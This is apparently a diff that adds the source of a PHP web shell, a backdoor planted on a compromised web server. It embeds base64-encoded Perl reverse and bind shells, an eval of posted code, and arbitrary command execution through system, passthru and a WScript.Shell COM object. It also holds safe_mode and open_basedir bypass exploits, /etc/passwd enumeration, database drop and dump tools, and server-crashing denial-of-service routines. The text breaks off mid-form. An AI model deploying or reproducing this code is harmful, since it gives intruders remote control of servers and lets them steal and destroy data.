+if ($_REQUEST['cdirname']){
+if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
+function bcn($ipbc,$pbc){
+$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
+NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
+MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
+dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
+IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
+YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
+LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
+KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
+KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
+IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
+ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
+$opbc=fopen("bcc.pl","w");
+fwrite($opbc,base64_decode($bcperl));
+fclose($opbc);
+system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
+}
+function wbp($wb){
+$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
+cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
+a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
+ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
+IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
+IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
+VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
+VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
+$opwb=fopen("wbp.pl","w");
+fwrite($opwb,base64_decode($wbp));
+fclose($opwb);
+echo getcwd();
+system("perl wbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
+}
+function lbp($wb){
+$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
+YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
+U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
+VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
+QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
+dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
+b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
+Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
+$oplb=fopen("lbp.pl","w");
+fwrite($oplb,base64_decode($lbp));
+fclose($oplb);
+system("perl lbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
+}
+
+if($_REQUEST['portbw']){
+wbp($_REQUEST['portbw']);
+
+}if($_REQUEST['portbl']){
+lbp($_REQUEST['portbl']);
+}
+if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
+bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
+
+}
+
+if($_REQUEST['do']=="bc"){
+echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< ����shell >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
+
+}
+function copyf($file1,$file2,$filename){
+global $slash;
+$fpc = fopen($file1, "rb");
+$source = '';
+while (!feof($fpc)) {
+$source .= fread($fpc, 8192);
+}
+fclose($fpc);
+$opt = fopen($file2.$slash.$filename, "w");
+fwrite($opt, $source);
+fclose($opt);
+}
+if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
+if(is_writable($_REQUEST['cpyto'])){
+echo $_REQUEST['address'];
+copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
+}else{alert("Permission Denied !");}}
+if($_REQUEST['cfilename']){
+
+echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value="  Create  "></form>'.$end;exit;
+}
+
+if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
+if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
+fwrite($ofile4c,$_REQUEST['nf4cs']);
+fclose($ofile4c);
+alert("File Saved !");}else{alert("Permission Denied !");}}
+
+function sqlclienT(){
+global $t,$errorbox,$et,$hcwd;
+if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
+$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
+$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
+$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
+
+}
+
+if (isset ($_GET[select_db])){
+	$getdb=$_GET[select_db];
+	$_SESSION[db]=$getdb;
+	$query="SHOW TABLES";
+	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
+}
+elseif (isset ($_GET[select_tbl])){
+	$tbl=$_GET[select_tbl];
+	$_SESSION[tbl]=$tbl;
+	$query="SELECT * FROM `$tbl`";
+	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
+}
+elseif (isset ($_GET[drop_db])){
+	$getdb=$_GET[drop_db];
+	$_SESSION[db]=$getdb;
+	$query="DROP DATABASE `$getdb`";
+	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
+	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
+}
+elseif (isset ($_GET[drop_tbl])){
+	$getbl=$_GET[drop_tbl];
+	$query="DROP TABLE `$getbl`";
+	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
+	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
+}
+elseif (isset ($_GET[drop_row])){
+	$getrow=$_GET[drop_row];
+	$getclm=$_GET[clm];
+	$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
+	$tbl=$_SESSION[tbl];
+	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
+	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
+}
+else
+	$res=querY($type,$server,$user,$pass,$db,$query);
+
+if($res){
+$res=htmlspecialchars($res);
+$row=array ();
+$title=explode('[+][+][+]',$res);
+$trow=explode('[-][-][-]',$title[1]);
+$row=explode('|+|+|+|+|+|',$title[0]);
+$data=array();
+$field=$trow[count($trow)-2];
+if (strstr($trow[0],'Database')!='')
+	$obj='db';
+elseif (substr($trow[0],0,6)=='Tables')
+	$obj='tbl';
+else
+	$obj='row';
+$i=0;
+foreach ($row as $a){
+if($a!='')
+$data[$i++]=explode('|-|-|-|-|-|',$a);
+}
+
+echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
+foreach ($trow as $ti)
+echo "<td bgcolor='F2F2F2'>$ti</td>";
+echo "</tr>";
+$j=0;
+while ($data[$j]){
+	echo "<tr>";
+	foreach ($data[$j++] as $dr){
+		echo "<td>";
+		if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
+		echo $dr;
+		if($obj!='row') echo "</a>";
+		echo "</td>";
+	}
+	echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
+	if($obj=='row')
+		echo "&clm=$field";
+	echo "'>Drop</a></td></tr>";
+}
+echo "</table><br>";
+
+}
+
+
+
+	
+
+if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
+echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL  onClick='document.client.serveR.disabled = false;' ";
+if ($_REQUEST['typE']=='MySQL')echo 'selected';
+echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
+if ($_REQUEST['typE']=='MSSQL')echo 'selected';
+echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
+if ($_REQUEST['typE']=='Oracle')echo 'selected';
+echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
+if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
+echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
+if ($_REQUEST['typE']=='DB2')echo 'selected';
+echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
+if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; 
+echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
+if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; 
+echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
+if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123'; 
+echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
+if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); 
+echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
+if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; 
+echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
+}
+
+
+function querY($type,$host,$user,$pass,$db='',$query){
+$res='';
+switch($type){
+case 'MySQL':
+if(!function_exists('mysql_connect'))return 0;
+$link=mysql_connect($host,$user,$pass);
+if($link){
+if(!empty($db))mysql_select_db($db,$link);
+$result=mysql_query($query,$link);
+if ($result!=1){
+while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<mysql_num_fields($result);$i++)
+$res.=mysql_field_name($result,$i).'[-][-][-]';
+}
+mysql_close($link);
+return $res;
+}
+break;
+case 'MSSQL':
+if(!function_exists('mssql_connect'))return 0;
+$link=mssql_connect($host,$user,$pass);
+if($link){
+if(!empty($db))mssql_select_db($db,$link);
+$result=mssql_query($query,$link);
+while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<mssql_num_fields($result);$i++)
+$res.=mssql_field_name($result,$i).'[-][-][-]';
+mssql_close($link);
+return $res;
+}
+break;
+case 'Oracle':
+if(!function_exists('ocilogon'))return 0;
+$link=ocilogon($user,$pass,$db);
+if($link){
+$stm=ociparse($link,$query);
+ociexecute($stm,OCI_DEFAULT);
+while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<oci_num_fields($stm);$i++)
+$res.=oci_field_name($stm,$i).'[-][-][-]';
+return $res;
+}
+break;
+case 'PostgreSQL':
+if(!function_exists('pg_connect'))return 0;
+$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
+if($link){
+$result=pg_query($link,$query);
+while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<pg_num_fields($result);$i++)
+$res.=pg_field_name($result,$i).'[-][-][-]';
+pg_close($link);
+return $res;
+}
+break;
+case 'DB2':
+if(!function_exists('db2_connect'))return 0;
+$link=db2_connect($db,$user,$pass);
+if($link){
+$result=db2_exec($link,$query);
+while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
+$res.='[+][+][+]';
+for($i=0;$i<db2_num_fields($result);$i++)
+$res.=db2_field_name($result,$i).'[-][-][-]';
+db2_close($link);
+return $res;
+}
+break;
+}
+return 0;
+}
+function bywsym($file){
+if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
+
+if(!is_writable("."))
+	die("not writable directory");
+$level=0;
+for($as=0;$as<$fakedep;$as++){
+	if(!file_exists($fakedir))
+		mkdir($fakedir);
+	chdir($fakedir);
+}
+while(1<$as--) chdir("..");
+$hardstyle = explode("/", $file);
+for($a=0;$a<count($hardstyle);$a++){
+	if(!empty($hardstyle[$a])){
+		if(!file_exists($hardstyle[$a])) 
+			mkdir($hardstyle[$a]);
+		chdir($hardstyle[$a]);
+		$as++;
+}}
+$as++;
+while($as--)
+	chdir("..");
+@rmdir("fakesymlink");
+@unlink("fakesymlink");
+@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
+while(1)
+	if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
+	else $num++;
+@unlink("fakesymlink");
+mkdir("fakesymlink");
+}
+function bypcu($file){
+$level=0;
+
+if(!file_exists("file:"))
+	mkdir("file:");
+chdir("file:");
+$level++;
+
+$hardstyle = explode("/", $file);
+
+for($a=0;$a<count($hardstyle);$a++){
+	if(!empty($hardstyle[$a])){
+		if(!file_exists($hardstyle[$a])) 
+			mkdir($hardstyle[$a]);
+		chdir($hardstyle[$a]);
+		$level++;
+	}
+}
+
+while($level--) chdir("..");
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
+
+echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
+
+if(FALSE==curl_exec($ch))
+	die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
+
+echo ' </textarea> </FONT>';
+
+curl_close($ch);
+}
+if ($_REQUEST['bypcu']){
+bypcu($_REQUEST['bypcu']);
+}
+if($_REQUEST['do']=="bypasscmd"){
+if($_POST['bycw']){
+echo $_POST['bycw'];
+$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
+            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
+            $stdout = $exec->StdOut();
+            $stcom = $stdout->ReadAll();}
+			
+echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
+}
+if($_REQUEST['do']=="bypassdir"){
+if($_POST['byoc']){
+if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
+$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
+}else{$bopens="Can Not Bypass This";}
+}
+if($_POST['byfc']){
+curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
+$debfc=curl_exec($ch);
+}
+if($_POST['byetc']){
+for($bye=0;$bye<40000;$bye++){
+$sbep =$sbep. posix_getpwuid($bye);
+}}
+if($_POST['byfc9']){
+echo "not sucsfull";
+}
+if($_REQUEST['bysyml']){
+$file=$_REQUEST['bysyml'];
+bywsym($file);
+}
+echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
+
+
+
+
+}
+function printdrive(){
+global $slash;
+foreach (range("A","Z") as $tempdrive) {
+if (is_dir($tempdrive.":".$slash)){
+$adri=$tempdrive.":".$slash;
+$drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
+}
+}
+return $drivea;
+}
+if($_POST['nameren'] && $_POST['addressren']){
+if(is_writable($_REQUEST['addressren'])){
+
+rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
+}else{alert("Permission Denied !");}
+}
+if($_GET['do']=="delete"){
+
+if ($_GET['type']=="dir"){
+if(is_writable($_REQUEST['address'])){
+$dir=$_GET['address'].$_GET['filename'];
+deleteDirectory($dir);
+alert("Deleted Successful !");
+}else{alert("Permission Denied !");}
+}elseif($_GET['type']=="file"){
+if(is_writable($_GET['address'].$_GET['filename'])){
+unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
+}else{alert("Permission Denied !");}
+}
+}
+if($_POST['fedit'] && $_POST['namefe']){
+if(is_writable($_REQUEST['address'])){
+
+
+$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
+fwrite($opensave,html_entity_decode($_POST['fedit']));
+fclose($opensave);alert("File Saved Successful !");
+}else{alert("Permission Denied !");}
+}
+if ($_POST['evalsource']){
+
+eval($_POST['evalsource']);
+}
+if($_GET['do']=="eval"){
+echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value="  eXecute  "></form></p>'.$end;exit;
+}
+if($_GET['do']=="info"){
+
+if(ini_get('register_globals')){
+$registerg="Enable";
+}else{
+$registerg="disable";
+}
+if(extension_loaded('curl')){
+$curls="Enable";
+}else{
+$curls="disable";
+}
+if(@function_exists('mysql_connect')){
+$db_on = "Mysql : On";
+};
+if(@function_exists('mssql_connect')){
+$db_on = "Mssql : On";
+};
+if(@function_exists('pg_connect')){
+$db_on = "PostgreSQL : On";
+};if(@function_exists('ocilogon')){
+$db_on = "Oracle : On";
+};
+
+echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
+exit;
+}
+if ($_GET['do']=="cmd"){
+echo $head.'
+<form method=get action="'.$me.'">
+<p align="center">
+<textarea rows="19" name="S1" cols="87">';
+if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
+echo $_GET['execmethod']($_GET['command']);}
+if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
+echo $_POST['execmethod']($_POST['command']);}
+
+if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
+popen($_GET['command'],"r");}
+
+echo'</textarea></p><p align="center">
+<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
+  <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option><option value="popen">popen</option>
+</select><input type="submit" value="eXecute">
+</p></form>'.$end;exit;}
+if ($_GET['do']=="symlink"){
+echo $head.'
+<form method=post action="'.$me.'">
+<p align="center">
+SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
+<form method=post action="'.$me.'"><p align="center">
+
+SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
+</p></form>'.$end;exit;}
+if ($_POST['ad1syp'] && $_POST['ad2syp']){
+if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
+alert("Symlink Worked !");
+}else{
+alert("Symlink Not Worked !");
+}}
+if ($_POST['ad1syc'] && $_POST['ad2syc']){
+if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
+alert("Symlink Worked !");
+}else{alert("Symlink Not Worked !");}
+}
+if ($_GET['do']=="d0slocal"){
+echo $head.'
+<p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
+if ($_GET['dosthisserver']=="1"){
+function dosserver(){
+$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
+for($i=0;$i<2;){
+$buff=bcpow($junk, '3', 2);
+$buff=null;
+}
+}
+dosserver();
+}
+if ($_GET['dosthisserver']=="2"){
+function cx(){cx();}
+ cx();
+}
+if ($_GET['do']=="����ת��"){
+$hash=null;
+if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
+$hash=md5($_GET['stringtoh']);
+}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
+$hash=sha1($_GET['stringtoh']);
+}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
+$hash=crc32($_GET['stringtoh']);
+}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
+$hash=base64_encode($_GET['stringtoh']);
+}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
+$hash=base64_decode($_GET['stringtoh']);
+}
+echo $head.'
+<form method=get action="'.$me.'">
+<p align="center">����ת��<br><input type=hidden name=do value=����ת��>
+<input name=stringtoh size=58><select name=hashtoh>
+<option value="md5">MD5</option>
+<option value="crc32">CRC32</option>
+<option value="sha1">SHA1</option>
+<option value="b64e">Base64 Encode!</option>
+<option value="b64d">Base64 Decode!</option>
+<br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="����ת��">
+
+</p></form>'.$end;exit;}
+if ($_GET['do']=="dump"){
+echo $head.'<p align="center">';
+echo '<table border=1 width=400 style="border-collapse: collapse"  bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>�������ݿ�</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>���ݿ���� Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value="  Dump!  " 